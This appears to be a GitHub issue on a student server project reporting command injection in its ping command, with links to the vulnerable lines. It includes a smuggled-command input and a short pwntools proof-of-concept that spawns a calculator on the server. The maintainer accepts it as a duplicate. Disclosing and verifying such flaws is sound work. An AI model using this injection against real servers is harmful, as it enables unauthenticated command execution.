Command injection in ping command

[matrizzo]

There is a command injection vulnerability in the server's implementation of the ping command.

When the server is executing the ping command it concatenates the command ('ping') with the first argument given by the user and with '-c 1' (https://github.com/si-co/grass/blob/final/lib/commands.cpp#L110). The result is then passed to a shell using popen without further sanitization in _check_cmd (https://github.com/si-co/grass/blob/final/lib/utils.cpp#L61). This means that an unauthenticated attacker can execute arbitrary shell commands on the server by sending "ping ;;" (e.g. "ping ;gnome-calculator;").

I have created a proof-of-concept exploit (python/pwntools). The exploit takes the address and port at which the server is listening as the first two command line arguments and spawns a calculator on the machine where the server is running.

from pwn import *
import sys

if len(sys.argv) < 3:
    print 'Usage: {} <hostname> <port>'.format(sys.argv[0])
    exit()

SERVER_ADDR = sys.argv[1]
SERVER_PORT = int(sys.argv[2])

r = remote(SERVER_ADDR, SERVER_PORT)

r.sendline('ping ;gnome-calculator;')

[si-co]

Duplicate #9. Exploit verified and vulnerability accepted.